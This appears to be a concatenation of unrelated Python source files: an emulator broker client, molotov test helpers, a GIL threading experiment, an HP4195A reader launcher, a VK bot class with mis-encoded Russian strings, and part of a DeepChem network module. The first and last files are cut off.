def _EmulatorPath(emulator_id=None, verb=None):
"""Builds a broker request path for operating on the specified emulator."""
path = '/v1/emulators'
if emulator_id:
path += '/' + urllib.quote(emulator_id)
if verb:
path += ':' + urllib.quote(verb)
return path
class Broker(object):
"""Broker manages a single instance of a broker process.
The broker process may be started through an instance of this class. An
already-running process can be manipulated through an instance of this class
as well.
"""
def __init__(self, address, config_file=None, broker_dir=None):
"""Constructor.
Args:
address: (str) The host or host-port of the broker server. The server may
already be running.
config_file: (str) The full path to the broker config file.
broker_dir: (str) A custom path to the broker directory.
"""
if config_file is not None:
assert os.path.isabs(config_file)
self._address = address
self._config_file = config_file
if broker_dir:
self._broker_dir = broker_dir
else:
self._broker_dir = os.path.join(util.GetCloudSDKRoot(), 'bin', 'broker')
self._host_port = arg_parsers.HostPort.Parse(address)
self._current_platform = platforms.Platform.Current()
self._process = None
self._comm_thread = None
def Start(self, redirect_output=False, logtostderr=False, wait_secs=10):
"""Starts the broker server, optionally with output redirection.
Args:
redirect_output: (bool) Whether to merge the stdout and stderr of the
broker server with the current process' output.
logtostderr: (bool) Whether the broker should log to stderr instead of
to a log file.
wait_secs: (float) The maximum time to wait for the broker to start
serving.
Raises:
BrokerError: If start failed.
"""
if self._process or self.IsRunning():
# Already started, possibly by another process.
return
args = [self._BrokerBinary()]
if self._host_port.host:
args.append('--host={0}'.format(self._host_port.host))
if self._host_port.port:
args.append('--port={0}'.format(self._host_port.port))
if self._config_file:
args.append('--config_file={0}'.format(self._config_file))
if logtostderr:
args.append('--logtostderr') # Disables file logging.
# The broker is run as a detached (daemon) process.
popen_args = self._current_platform.AsyncPopenArgs()
log.info('Starting broker: %r', args)
if redirect_output:
# Pipe the broker's output to our own, communicating on another thread
# to avoid blocking the current thread.
self._process = subprocess.Popen(args,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
**popen_args)
self._comm_thread = threading.Thread(target=self._process.communicate)
self._comm_thread.start()
else:
self._process = subprocess.Popen(args, **popen_args)
if not _Await(self.IsRunning, wait_secs):
log.warn('Broker did not start within {0}s'.format(wait_secs))
try:
# Clean up.
self.Shutdown()
except BrokerError:
pass
raise BrokerError('Broker failed to start')
log.info('Started broker: %s' % self._address)
def IsRunning(self):
"""Returns True iff the broker is known to be running."""
# We issue an RPC to check if the broker is running.
try:
response, _ = self._SendJsonRequest('GET', _EmulatorPath(),
timeout_secs=1.0)
return response.status == httplib.OK
except RequestError:
return False
def Shutdown(self, wait_secs=10):
"""Shuts down the broker server.
Args:
wait_secs: (float) The maximum time to wait for the broker to shutdown.
Raises:
BrokerError: If shutdown failed.
"""
if self._process:
try:
execution_utils.KillSubprocess(self._process)
self._process = None
if self._comm_thread:
self._comm_thread.join()
self._comm_thread = None
except RuntimeError as e:
log.warn('Failed to shutdown broker: %s' % e)
raise BrokerError('Broker failed to shutdown: %s' % e)
else:
# Invoke the /shutdown handler.
try:
self._SendJsonRequest('POST', '/shutdown')
except RequestSocketError as e:
if e.errno not in (SocketConnRefusedErrno(), SocketConnResetErrno()):
raise
# We may get an exception reading the response to the shutdown
# request, because the shutdown may preempt the response.
if not _Await(lambda: not self.IsRunning(), wait_secs):
log.warn('Failed to shutdown broker: still running after {0}s'.format(
wait_secs))
raise BrokerError('Broker failed to shutdown: timed-out')
log.info('Shutdown broker.')
def CreateEmulator(self,
emulator_id,
path,
args,
target_patterns,
resolved_host=None):
"""Creates a new emulator entry.
Args:
emulator_id: (str) The emulator id
path: (str) The path to the emulator binary.
args: (list of str) The command line arguments to the emulator.
target_patterns: (list or str) The regular expressions used to match
input targets for the emulator.
resolved_host: (str) The address to use when resolving the new emulator.
Only specified if the lifetime of this emulator is not managed by
this broker.
Raises:
BrokerNotRunningError: If the broker is not running.
BrokerError: If the creation failed.
"""
if not self.IsRunning():
raise BrokerNotRunningError('Failed to create emulator')
emulator = {
'emulator_id': emulator_id,
'start_command': {
'path': path,
'args': args,
},
'rule': {
'rule_id': emulator_id,
'target_patterns': target_patterns,
}
}
if resolved_host:
emulator['rule']['resolved_host'] = resolved_host
url = _EmulatorPath()
body = json.dumps(emulator)
response, data = self._SendJsonRequest('POST', url, body=body)
if response.status != httplib.OK:
log.warn('Failed to create emulator: {0} ({1})'.format(response.reason,
response.status))
raise BrokerError('Failed to create emulator: %s' % data)
def GetEmulator(self, emulator_id):
"""Returns emulator entry (Json dict).
Args:
emulator_id: (str) The id of the emulator to get.
Returns:
A Json dict representation of a google.emulators.Emulator proto message.
Raises:
BrokerNotRunningError: If the broker is not running.
BrokerError: If the get failed.
"""
if not self.IsRunning():
raise BrokerNotRunningError('Failed to get emulator: %s' % emulator_id)
response, data = self._SendJsonRequest('GET', _EmulatorPath(emulator_id))
if response.status != httplib.OK:
raise BrokerError('Failed to get emulator: %s' % data)
return json.loads(data)
def ListEmulators(self):
"""Returns the list of emulators, or None.
Returns:
A list of Json dicts representing google.emulators.Emulator proto
messages, or None if the list operation fails.
Raises:
BrokerNotRunningError: If the broker is not running.
"""
if not self.IsRunning():
raise BrokerNotRunningError('Failed to list emulators')
try:
response, data = self._SendJsonRequest('GET', _EmulatorPath())
if response.status != httplib.OK:
log.warn('Failed to list emulators: {0} ({1})'.format(response.reason,
response.status))
return
except RequestError:
return
list_response = json.loads(data)
try:
return list_response['emulators']
except KeyError:
# The expected values were not present.
return
def StartEmulator(self, emulator_id):
"""Starts the specified emulator via the broker, which must be running.
Args:
emulator_id: (str) The id of the emulator to start.
Returns:
True if the emulator is started. False if it was already running, cannot
be started, or is unknown.
Raises:
BrokerNotRunningError: If the broker is not running.
BrokerError: If the emulator could not be started for another reason.
"""
if not self.IsRunning():
raise BrokerNotRunningError('Failed to start emulator: %s' % emulator_id)
url = _EmulatorPath(emulator_id, verb='start')
response, data = self._SendJsonRequest('POST', url)
if response.status != httplib.OK:
log.warn('Failed to start emulator {0}: {1} ({2})'.format(
emulator_id, response.reason, response.status))
raise BrokerError('Failed to start emulator: %s' % data)
def StopEmulator(self, emulator_id):
"""Stops the specified emulator via the broker, which must be running.
Args:
emulator_id: (str) The id of the emulator to stop.
Returns:
True if the emulator is stopped or wasn't running to begin with. False
if the emulator could not be stopped or is unknown.
Raises:
BrokerNotRunningError: If the broker is not running.
BrokerError: If the emulator could not be stopped for another reason.
"""
if not self.IsRunning():
raise BrokerNotRunningError('Failed to stop emulator: %s' % emulator_id)
url = _EmulatorPath(emulator_id, verb='stop')
response, data = self._SendJsonRequest('POST', url)
if response.status != httplib.OK:
log.warn('Failed to stop emulator {0}: {1} ({2})'.format(
emulator_id, response.reason, response.status))
raise BrokerError('Failed to stop emulator: %s' % data)
def _BrokerBinary(self):
"""Returns the path to the broker binary."""
return '{0}/broker'.format(self._broker_dir)
def _SendJsonRequest(self, method, path, body=None, timeout_secs=300):
"""Sends a request to the broker.
Args:
method: (str) The HTTP method.
path: (str) The URI path.
body: (str) The request body.
timeout_secs: (float) The request timeout, in seconds.
Returns:
(HTTPResponse, str) or (None, None).
Raises:
RequestTimeoutError: The request timed-out.
RequestSocketError: The request failed due to a socket error.
RequestError: The request errored out in some other way.
"""
uri = 'http://{0}{1}'.format(self._address, path)
http_client = httplib2.Http(timeout=timeout_secs)
try:
return http_client.request(
uri=uri,
method=method,
headers={'Content-Type': 'application/json; charset=UTF-8'},
body=body)
except socket.error as e:
if isinstance(e, socket.timeout):
raise RequestTimeoutError(e)
error = RequestSocketError(e)
if e.errno:
error.errno = e.errno
raise error
except httplib.HTTPException as e:
if isinstance(e, httplib.ResponseNotReady):
raise RequestTimeoutError(e)
raise RequestError(e)
except httplib2.HttpLib2Error as e:
raise RequestError(e)
|
support.py | import sys
import signal
import os
import asyncio
import unittest
import time
from contextlib import contextmanager
import functools
from collections import namedtuple
from http.client import HTTPConnection
from io import StringIO
import http.server
import socketserver
import pytest
from queue import Empty
from unittest.mock import patch
from aiohttp.client_reqrep import URL
from multidict import CIMultiDict
from molotov.api import _SCENARIO, _FIXTURES
from molotov import util
from molotov.run import PYPY
from molotov.session import LoggedClientRequest, LoggedClientResponse
from molotov.sharedconsole import SharedConsole
from molotov.sharedcounter import SharedCounters
HERE = os.path.dirname(__file__)
skip_pypy = pytest.mark.skipif(PYPY, reason="could not make work on pypy")
only_pypy = pytest.mark.skipif(not PYPY, reason="only pypy")
if os.environ.get("HAS_JOSH_K_SEAL_OF_APPROVAL", False):
_TIMEOUT = 1.0
else:
_TIMEOUT = 0.2
async def serialize(console):
res = []
while True:
try:
res.append(console._stream.get(block=True, timeout=_TIMEOUT))
except Empty:
break
return "".join(res)
class RequestHandler(http.server.SimpleHTTPRequestHandler):
def do_GET(self):
if self.path == "/redirect":
self.send_response(302)
self.send_header("Location", "/")
self.end_headers()
return
if self.path == "/slow":
try:
time.sleep(5)
self.send_response(200)
self.end_headers()
except SystemExit:
pass
return
return super(RequestHandler, self).do_GET()
def do_POST(self):
content_length = int(self.headers["Content-Length"])
body = self.rfile.read(content_length)
self.send_response(200)
self.send_header("Content-Type", "application/json")
self.end_headers()
self.wfile.write(body)
def _run(port):
os.chdir(HERE)
socketserver.TCPServer.allow_reuse_address = True
attempts = 0
httpd = None
error = None
while attempts < 3:
try:
httpd = socketserver.TCPServer(("", port), RequestHandler)
break
except Exception as e:
error = e
attempts += 1
time.sleep(0.1)
if httpd is None:
raise OSError("Could not start the coserver: %s" % str(error))
def _shutdown(*args, **kw):
httpd.server_close()
sys.exit(0)
signal.signal(signal.SIGTERM, _shutdown)
signal.signal(signal.SIGINT, _shutdown)
httpd.serve_forever()
def run_server(port=8888):
"""Running in a subprocess to avoid any interference
"""
p = util.multiprocessing.Process(target=functools.partial(_run, port))
p.start()
start = time.time()
connected = False
while time.time() - start < 5 and not connected:
try:
conn = HTTPConnection("localhost", 8888)
conn.request("GET", "/")
conn.getresponse()
connected = True
except Exception:
time.sleep(0.1)
if not connected:
os.kill(p.pid, signal.SIGTERM)
p.join(timeout=1.0)
raise OSError("Could not connect to coserver")
return p
_CO = {"clients": 0, "server": None}
@contextmanager
def coserver(port=8888):
if _CO["clients"] == 0:
_CO["server"] = run_server(port)
_CO["clients"] += 1
try:
yield
finally:
_CO["clients"] -= 1
if _CO["clients"] == 0:
os.kill(_CO["server"].pid, signal.SIGTERM)
_CO["server"].join(timeout=1.0)
_CO["server"].terminate()
_CO["server"] = None
def _respkw():
from aiohttp.helpers import TimerNoop
return {
"request_info": None,
"writer": None,
"continue100": None,
"timer": TimerNoop(),
"traces": [],
"loop": asyncio.get_event_loop(),
"session": None,
}
def Response(method="GET", status=200, body=b"***"):
response = LoggedClientResponse(method, URL("/"), **_respkw())
response.status = status
response.reason = ""
response.code = status
response.should_close = False
response._headers = CIMultiDict({})
response._raw_headers = []
class Body:
async def read(self):
return body
def feed_data(self, data):
if body == b"":
err = AttributeError(
"'EmptyStreamReader' object has no " "attribute 'unread_data'"
)
raise err
pass
response.content = Body()
response._content = body
return response
def Request(url="http://127.0.0.1/", method="GET", body=b"***", loop=None):
if loop is None:
loop = asyncio.get_event_loop()
request = LoggedClientRequest(method, URL(url), loop=loop)
request.body = body
return request
class TestLoop(unittest.TestCase):
def setUp(self):
self.old = dict(_SCENARIO)
self.oldsetup = dict(_FIXTURES)
util._STOP = False
util._STOP_WHY = []
util._TIMER = None
self.policy = asyncio.get_event_loop_policy()
_SCENARIO.clear()
_FIXTURES.clear()
def tearDown(self):
_SCENARIO.clear()
_FIXTURES.clear()
_FIXTURES.update(self.oldsetup)
asyncio.set_event_loop_policy(self.policy)
def get_args(self, console=None):
args = namedtuple("args", "verbose quiet duration exception")
args.force_shutdown = False
args.ramp_up = 0.0
args.verbose = 1
args.quiet = False
args.duration = 0.2
args.exception = True
args.processes = 1
args.debug = True
args.workers = 1
args.console = True
args.statsd = False
args.single_mode = None
args.single_run = False
args.max_runs = None
args.delay = 0.0
args.sizing = False
args.sizing_tolerance = 0.0
args.console_update = 0
args.use_extension = []
args.fail = None
args.force_reconnection = False
args.disable_dns_resolve = False
if console is None:
console = SharedConsole(interval=0)
args.shared_console = console
return args
def async_test(func):
@functools.wraps(func)
def _async_test(*args, **kw):
oldloop = asyncio.get_event_loop()
loop = asyncio.new_event_loop()
asyncio.set_event_loop(loop)
loop.set_debug(True)
console = SharedConsole(interval=0)
results = SharedCounters(
"WORKER",
"REACHED",
"RATIO",
"OK",
"FAILED",
"MINUTE_OK",
"MINUTE_FAILED",
"MAX_WORKERS",
"SETUP_FAILED",
"SESSION_SETUP_FAILED",
)
kw["loop"] = loop
kw["console"] = console
kw["results"] = results
fut = asyncio.ensure_future(func(*args, **kw))
try:
loop.run_until_complete(fut)
finally:
loop.stop()
loop.close()
asyncio.set_event_loop(oldloop)
return fut.result()
return _async_test
def dedicatedloop(func):
@functools.wraps(func)
def _loop(*args, **kw):
old_loop = asyncio.get_event_loop()
loop = asyncio.new_event_loop()
asyncio.set_event_loop(loop)
try:
return func(*args, **kw)
finally:
if not loop.is_closed():
loop.stop()
loop.close()
asyncio.set_event_loop(old_loop)
return _loop
def dedicatedloop_noclose(func):
@functools.wraps(func)
def _loop(*args, **kw):
old_loop = asyncio.get_event_loop()
loop = asyncio.new_event_loop()
loop.set_debug(True)
loop._close = loop.close
loop.close = lambda: None
asyncio.set_event_loop(loop)
try:
return func(*args, **kw)
finally:
loop._close()
asyncio.set_event_loop(old_loop)
return _loop
@contextmanager
def catch_output():
oldout, olderr = sys.stdout, sys.stderr
sys.stdout, sys.stderr = StringIO(), StringIO()
try:
yield sys.stdout, sys.stderr
finally:
sys.stdout.seek(0)
sys.stderr.seek(0)
sys.stdout, sys.stderr = oldout, olderr
@contextmanager
def set_args(*args):
old = list(sys.argv)
sys.argv[:] = args
oldout, olderr = sys.stdout, sys.stderr
sys.stdout, sys.stderr = StringIO(), StringIO()
try:
yield sys.stdout, sys.stderr
finally:
sys.stdout.seek(0)
sys.stderr.seek(0)
sys.argv[:] = old
sys.stdout, sys.stderr = oldout, olderr
@contextmanager
def catch_sleep(calls=None):
original = asyncio.sleep
if calls is None:
calls = []
async def _slept(delay, result=None, *, loop=None):
# 86400 is the duration timer
if delay not in (0, 86400):
calls.append(delay)
# forces a context switch
await original(0)
with patch("asyncio.sleep", _slept):
yield calls
|
test_threading_GIL.py | import os
import threading
import time
import random
from collections import namedtuple
def cpu_task():
i = 60000000
for _ in range(i):
1+1
def sleep_task():
time.sleep(1)
def func_time(callable):
init = time.time()
callable()
end = time.time()
print(end - init)
if 0:
def p_entry1():
i = 10000000
def rest():
for _ in range(i):
1+1
for order in range(30):
print('', order)
rest()
def p_entry2():
i = 10000000
def rest():
for _ in range(i):
1+1
for order in range(30):
print(' ', order)
rest()
def p_entry3():
i = 10000000
def rest():
for _ in range(i):
1+1
for order in range(30):
print(' ', order)
rest()
T1 = threading.Thread(target = p_entry1)
T2 = threading.Thread(target = p_entry2)
T3 = threading.Thread(target = p_entry3)
T1.start()
T2.start()
T3.start()
T1.join()
T2.join()
T3.join()
if 0:
func_time(cpu_task)
func_time(sleep_task)
if 0:
def cpu_task_long():
for _ in range(1000000000): # 16.4
1+1
print('cpu done')
def sleep_task_long():
time.sleep(16.4)
print('sleep done')
def cpu_thread_entry():
cpu_task_long()
def sleep_thread_entry():
sleep_task_long()
T1 = threading.Thread(target = cpu_thread_entry)
#T2 = threading.Thread(target = sleep_thread_entry)
T1.start()
#T2.start()
#cpu_task_long()
sleep_task_long()
T1.join()
#T2.join()
if 0:
cycle = 30
count = 0
print(count)
def cpu_thread_entry():
for _ in range(cycle):
cpu_task()
print('cpu done')
def sleep_thread_entry():
for _ in range(cycle):
sleep_task()
print('sleep done')
T1 = threading.Thread(target = cpu_thread_entry)
T2 = threading.Thread(target = sleep_thread_entry)
init = time.time()
T1.start()
T2.start()
T1.join()
T2.join()
end = time.time()
print('cpu + sleep', end - init, 'seconds')
if 0:
cycle = 30
count = 0
print(count)
def cpu_thread_entry():
for _ in range(cycle):
cpu_task()
print('cpu done')
def sleep_thread_entry():
for _ in range(cycle):
sleep_task()
print('sleep done')
T1 = threading.Thread(target = cpu_thread_entry)
T2 = threading.Thread(target = cpu_thread_entry)
init = time.time()
T1.start()
T2.start()
T1.join()
T2.join()
end = time.time()
print('cpu + cpu', end - init, 'seconds')
if 0:
cycle = 30
count = 0
print(count)
def cpu_thread_entry():
for _ in range(cycle):
cpu_task()
print('cpu done')
def sleep_thread_entry():
for _ in range(cycle):
sleep_task()
print('sleep done')
T1 = threading.Thread(target = sleep_thread_entry)
T2 = threading.Thread(target = sleep_thread_entry)
init = time.time()
T1.start()
T2.start()
T1.join()
T2.join()
end = time.time()
print('sleep + sleep', end - init, 'seconds')
#not the way global interpreter Lock prevent
if 0:
global_count = 0
def increase1():
global global_count
for _ in range(50):
global_count += 1
print(global_count)
def increase2():
global global_count
for _ in range(50,100,1):
global_count += 1
print(' ', global_count)
T1 = threading.Thread(target = increase1)
T2 = threading.Thread(target = increase2)
T1.start()
T2.start()
T1.join()
T2.join()
#Question
if 1:
class RandChecker:
def __init__(self):
self.rand = random.random()
self.checker_list = [0] * 500
def sync(self):
for i in range(500):
self.checker_list[i] = self.rand
print(1)
def test_sync(self):
pivot = self.checker_list[0]
for i in range(500):
if self.checker_list[i] != pivot:
print('Error!!')
return
print('Success')
return
def interrupt(self):
for _ in range(30):
self.rand = random.random()
print(111111)
a = RandChecker()
T1 = threading.Thread(target = a.sync)
T2 = threading.Thread(target = a.interrupt)
T1.start()
T2.start()
T1.join()
T2.join()
a.test_sync() |
hp4195a_reader.py | import sys
import os
import threading
import logging.config
import hp4195a as hp
import multi_logging as ml
from multiprocessing import Queue, freeze_support
from main_window import MainWindow
from PyQt5 import QtWidgets
if __name__ == '__main__':
freeze_support()
command_queue = Queue()
message_queue = Queue()
data_queue = Queue()
logging_queue = Queue()
dp = hp.hp4195a(command_queue, message_queue, data_queue, logging_queue)
dp.daemon = True
dp.start()
app = QtWidgets.QApplication(sys.argv)
gp = MainWindow(command_queue, message_queue, data_queue, logging_queue)
if getattr(sys, 'frozen', False):
dir_name = os.path.dirname(sys.executable)
else:
dir_name = os.path.dirname(__file__)
log_file_path = os.path.join(dir_name, 'logging.conf')
logging.config.fileConfig(log_file_path, disable_existing_loggers=False)
lp = threading.Thread(target=ml.logger_thread, args=(logging_queue,))
lp.daemon = True
lp.start()
sys.exit(app.exec_())
dp.join()
logging_queue.put(None)
lp.join()
|
release.py | import sys
import datetime
import time
from threading import Thread
from vk_api.bot_longpoll import VkBotEventType
from vk_api.utils import get_random_id
from vk_api.keyboard import VkKeyboard
from core.utils import BaseStarter, LoginManagerMixin, APIBackendMixin, KeyboardMixin, FileDB, BotLogger
class VkBot(BaseStarter):
"""
A class that has collected all the basic elements for creating a fully functional bot
(Launching, working with an account, working with an external API, working with a keyboard).
Implemented basic commands needed in most bots
"""
logger = BotLogger().get_logger()
def __init__(self, system_name: str = '[ะะฒัะพะผะฐัะธัะตัะบะพะต ะพะฟะพะฒะตัะตะฝะธะต]', *args, **kwargs):
self.system_name = system_name
self.standart_msg_block = ''
self.api = APIBackendMixin()
self.keyboard = KeyboardMixin()
self.user = LoginManagerMixin()
if kwargs.get('logger'):
self.logger = kwargs.get('logger')
super().__init__(*args, **kwargs)
@logger.catch
def send_msg(self, send_id: int, message: str, keyboard: VkKeyboard = None) -> None:
""" Sending a message """
if keyboard:
self._vk_api.messages.send(peer_id=send_id,
message=message,
random_id=get_random_id(),
keyboard=keyboard.get_keyboard())
else:
self._vk_api.messages.send(peer_id=send_id,
message=message,
random_id=get_random_id())
@logger.catch
def get_user_name(self, user_id: int) -> str:
""" Getting the username """
return self._vk_api.users.get(user_id=user_id)[0]['first_name']
@logger.catch
def get_user_last_name(self, user_id: int) -> str:
""" Get the user's last name """
return self._vk_api.users.get(user_id=user_id)[0]['last_name']
@logger.catch
def get_full_name(self, send_id: int) -> str:
return '{} {}'.format(self.get_user_name(send_id), self.get_user_last_name(send_id))
@logger.catch
def get_user_closed(self, send_id: int) -> str:
print(self._vk_api.users.get(user_id=send_id)[0]['is_closed'])
@logger.catch
def get_bot_info(self, *args, **kwargs):
time_format = str(datetime.timedelta(seconds=time.time()-self.__start_time))
bot_info = 'ะะพั ัะฐะฑะพัะฐะตั: {}.\nะัะฟะพะปะฝะตะฝะพ: {} ะบะพะผะฐะฝะด'.format(time_format, self.__executed_commands)
print(bot_info)
@logger.catch
def send_admin_msg(self, msg):
for admin in self.admins:
self.send_msg(admin, message=msg)
@logger.catch
def command_help(self, send_id: int) -> None:
message = ''
for command in self.commands:
command_not_param = command.split(' *')[0]
if not command.count('*nshow'):
if command.count('*admin'):
if send_id in self.admins:
message += f"{command_not_param}: {self.commands[command]['comment']} ๐\n\n"
else:
message += command_not_param + ': ' + self.commands[command]['comment'] + '\n\n'
self.send_msg(send_id, message=message, keyboard=self.keyboard.get_standart_keyboard())
@logger.catch
def command_msg(self, send_id: int):
text_in_msg = self._text_in_msg.replace(self._command_args, '')
user_id = text_in_msg.split()[1]
msg = ' '.join(text_in_msg.split()[2:])
username = FileDB().get_by_value(value=user_id, index=0)
username = username[0][1]
self.send_msg(user_id,
message=f'{self.system_name}{msg}',
)
self.send_msg(send_id,
message=f'โ
๏ธ ะกะพะพะฑัะตะฝะธะต ะฟะพะปัะทะพะฒะฐัะตะปั: {username} - ััะฟะตัะฝะพ ะพัะฟัะฐะฒะปะตะฝะพ!',
)
@logger.catch
def command_killbot(self, send_id: int):
if send_id in self.admins:
login = self.user.authenticate(str(send_id))[1]
self.send_admin_msg(f'๐ะะพั ััะฟะตัะฝะพ ะพััะฐะฝะพะฒะปะตะฝ, ะะดะผะธะฝะธัััะฐัะพัะพะผ {login}!')
sys.exit()
@logger.catch
def start(self, commands: dict, debug: bool = None, multithread: bool = True) -> None:
""" ะะฐะฟััะบ ะฑะพัะฐ """
print('ะฏ ะทะฐะฟััะตะฝ!')
self.__start_time = time.time()
self.__executed_commands = 0
if (self.debug != debug) and (debug is not None):
self.debug = debug
self.commands = commands
for event in self._long_poll.listen(): # ะกะปััะฐะตะผ ัะตัะฒะตั
# ะัะธัะปะพ ะฝะพะฒะพะต ัะพะพะฑัะตะฝะธะต
if event.type == VkBotEventType.MESSAGE_NEW:
send_id = event.object.peer_id
if self.debug and send_id in self.admins:
if multithread:
thread = Thread(target=self._command_starter, args=[event])
thread.start()
else:
self._command_starter(event=event)
self.__executed_commands += 1
else:
try:
if multithread:
thread = Thread(target=self._command_starter, args=[event])
thread.start()
else:
self._command_starter(event=event)
self.__executed_commands += 1
except Exception as exc:
text_message = event.object.text
username = '\n๐คะะผั ะฟะพะปัะทะพะฒะฐัะตะปั: {}\n๐ะขะตะบัั ัะพะพะฑัะตะฝะธั: {}'.format(self.get_full_name(send_id),
text_message)
self.__error_handler(exc=exc, any=username)
self.send_msg(send_id,
message='๐ะะฐ ัะตัะฒะตัะต ะฟัะพะธะทะพัะปะฐ ะพัะธะฑะบะฐ๐\nะั ัะถะต ะพะฟะพะฒะตััะธะปะธ ะะดะผะธะฝะธัััะฐัะธั ะพะฑ ััะพะผ, ะฟัะธะฝะพัะธะผ ัะฒะพะธ ะธะทะฒะธะฝะตะฝะธั๐',
keyboard=self.keyboard.get_standart_keyboard())
@logger.catch
def get_command_text(self, command, command_args):
return ''.join(list(command.replace(command_args, ''))[1:]).lstrip()
@logger.catch
def __error_handler(self, exc, any: str = ''):
self.send_admin_msg(f'โะัะพะธะทะพัะปะฐ ะพัะธะฑะบะฐ: {exc}\n{any}')
|
fcnet.py | """TensorFlow implementation of fully connected networks.
"""
from __future__ import print_function
from __future__ import division
from __future__ import unicode_literals
import warnings
import time
import numpy as np
import tensorflow as tf
import threading
import collections
import deepchem as dc
from deepchem.nn import model_ops
from deepchem.utils.save import log
from deepchem.metrics import to_one_hot, from_one_hot
from deepchem.models.tensorflow_models import TensorflowGraph
from deepchem.models.tensorflow_models import TensorflowGraphModel
from deepchem.models.tensorflow_models import TensorflowClassifier
from deepchem.models.tensorflow_models import TensorflowRegressor
from deepchem.metrics import to_one_hot
from deepchem.models.tensorgraph.tensor_graph import TensorGraph, TFWrapper
from deepchem.models.tensorgraph.layers import Feature, Label, Weights, WeightedError, Dense, Dropout, WeightDecay, Reshape, SoftMaxCrossEntropy, L2Loss
class TensorGraphMultiTaskClassifier(TensorGraph):
def __init__(self,
n_tasks,
n_features,
layer_sizes=[1000],
weight_init_stddevs=0.02,
bias_init_consts=1.0,
weight_decay_penalty=0.0,
weight_decay_penalty_type="l2",
dropouts=0.5,
activation_fns=tf.nn.relu,
n_classes=2,
**kwargs):
"""Create a TensorGraphMultiTaskClassifier.
In addition to the following arguments, this class also accepts all the keywork arguments
from TensorGraph.
Parameters
----------
n_tasks: int
number of tasks
n_features: int
number of features
layer_sizes: list
the size of each dense layer in the network. The length of this list determines the number of layers.
weight_init_stddevs: list or float
the standard deviation of the distribution to use for weight initialization of each layer. The length
of this list should equal len(layer_sizes). Alternatively this may be a single value instead of a list,
in which case the same value is used for every layer.
bias_init_consts: list or loat
the value to initialize the biases in each layer to. The length of this list should equal len(layer_sizes).
Alternatively this may be a single value instead of a list, in which case the same value is used for every layer.
weight_decay_penalty: float
the magnitude of the weight decay penalty to use
weight_decay_penalty_type: str
the type of penalty to use for weight decay, either 'l1' or 'l2'
dropouts: list or float
the dropout probablity to use for each layer. The length of this list should equal len(layer_sizes).
Alternatively this may be a single value instead of a list, in which case the same value is used for every layer.
activation_fns: list or object
the Tensorflow activation function to apply to each layer. The length of this list should equal
len(layer_sizes). Alternatively this may be a single value instead of a list, in which case the
same value is used for every layer.
n_classes: int
the number of classes
"""
super(TensorGraphMultiTaskClassifier, self).__init__(**kwargs)
self.n_tasks = n_tasks
self.n_features = n_features
self.n_classes = n_classes
n_layers = len(layer_sizes)
if not isinstance(weight_init_stddevs, collections.Sequence):
weight_init_stddevs = [weight_init_stddevs] * n_layers
if not isinstance(bias_init_consts, collections.Sequence):
bias_init_consts = [bias_init_consts] * n_layers
if not isinstance(dropouts, collections.Sequence):
dropouts = [dropouts] * n_layers
if not isinstance(activation_fns, collections.Sequence):
activation_fns = [activation_fns] * n_layers
# Add the input features.
mol_features = Feature(shape=(None, n_features))
prev_layer = mol_features
# Add the dense layers
for size, weight_stddev, bias_const, dropout, activation_fn in zip(
layer_sizes, weight_init_stddevs, bias_init_consts, dropouts,
activation_fns):
layer = Dense(
in_layers=[prev_layer],
out_channels=size,
activation_fn=activation_fn,
weights_initializer=TFWrapper(
tf.truncated_normal_initializer, stddev=weight_stddev),
biases_initializer=TFWrapper(
tf.constant_initializer, value=bias_const))
if dropout > 0.0:
layer = Dropout(dropout, in_layers=[layer])
prev_layer = layer
# Compute the loss function for each label.
output = Reshape(
shape=(-1, n_tasks, n_classes),
in_layers=[
Dense(in_layers=[prev_layer], out_channels=n_tasks * n_classes)
])
self.add_output(output)
labels = Label(shape=(None, n_tasks, n_classes))
weights = Weights(shape=(None, n_tasks))
loss = SoftMaxCrossEntropy(in_layers=[labels, output])
weighted_loss = WeightedError(in_layers=[loss, weights])
if weight_decay_penalty != 0.0:
weighted_loss = WeightDecay(
weight_decay_penalty,
weight_decay_penalty_type,
in_layers=[weighted_loss])
self.set_loss(weighted_loss)
def default_generator(self,
dataset,
epochs=1,
predict=False,
deterministic=True,
pad_batches=True):
for epoch in range(epochs):
for (X_b, y_b, w_b, ids_b) in dataset.iterbatches(
batch_size=self.batch_size,
deterministic=deterministic,
pad_batches=pad_batches):
feed_dict = dict()
if y_b is not None and not predict:
feed_dict[self.labels[0]] = to_one_hot(y_b.flatten(),
self.n_classes).reshape(
-1, self.n_tasks,
self.n_classes)
if X_b is not None:
feed_dict[self.features[0]] = X_b
if w_b is not None and not predict:
feed_dict[self.task_weights[0]] = w_b
yield feed_dict
def predict_proba(self, dataset, transformers=[], outputs=None):
return super(TensorGraphMultiTaskClassifier, self).predict(
dataset, transformers, outputs)
def predict(self, dataset, transformers=[], outputs=None):
"""
Uses self to make predictions on provided Dataset object.
Parameters
----------
dataset: dc.data.Dataset
Dataset to make prediction on
transformers: list
List of dc.trans.Transformers.
outputs: object
If outputs is None, then will assume outputs = self.outputs[0] (single
output). If outputs is a Layer/Tensor, then will evaluate and return as a
single ndarray. If outputs is a list of Layers/Tensors, will return a list
of ndarrays.
Returns
-------
y_pred: numpy ndarray or list of numpy ndarrays
"""
# Results is of shape (n_samples, n_tasks, n_classes)
retval = super(TensorGraphMultiTaskClassifier, self).predict(
dataset, transformers, outputs)
# retval is of shape (n_samples, n_tasks)
return np.argmax(retval, axis=2)
class TensorGraphMultiTaskRegressor(TensorGraph):
def __init__(self,
n_tasks,
n_features,
layer_sizes=[1000],
weight_init_stddevs=0.02,
bias_init_consts=1.0,
weight_decay_penalty=0.0,
weight_decay_penalty_type="l2",
dropouts=0.5,
activation_fns=tf.nn.relu,
**kwargs):
"""Create a TensorGraphMultiTaskRegressor.
In addition to the following arguments, this class also accepts all the keywork arguments
from TensorGraph.
Parameters
----------
n_tasks: int
number of tasks
n_features: int
number of features
layer_sizes: list
the size of each dense layer in the network. The length of this list determines the number of layers.
weight_init_stddevs: list or float
the standard deviation of the distribution to use for weight initialization of each layer. The length
of this list should equal len(layer_sizes)+1. The final element corresponds to the output layer.
Alternatively this may be a single value instead of a list, in which case the same value is used for every layer.
bias_init_consts: list or float
the value to initialize the biases in each layer to. The length of this list should equal len(layer_sizes)+1.
The final element corresponds to the output layer. Alternatively this may be a single value instead of a list,
in which case the same value is used for every layer.
weight_decay_penalty: float
the magnitude of the weight decay penalty to use
weight_decay_penalty_type: str
the type of penalty to use for weight decay, either 'l1' or 'l2'
dropouts: list or float
the dropout probablity to use for each layer. The length of this list should equal len(layer_sizes).
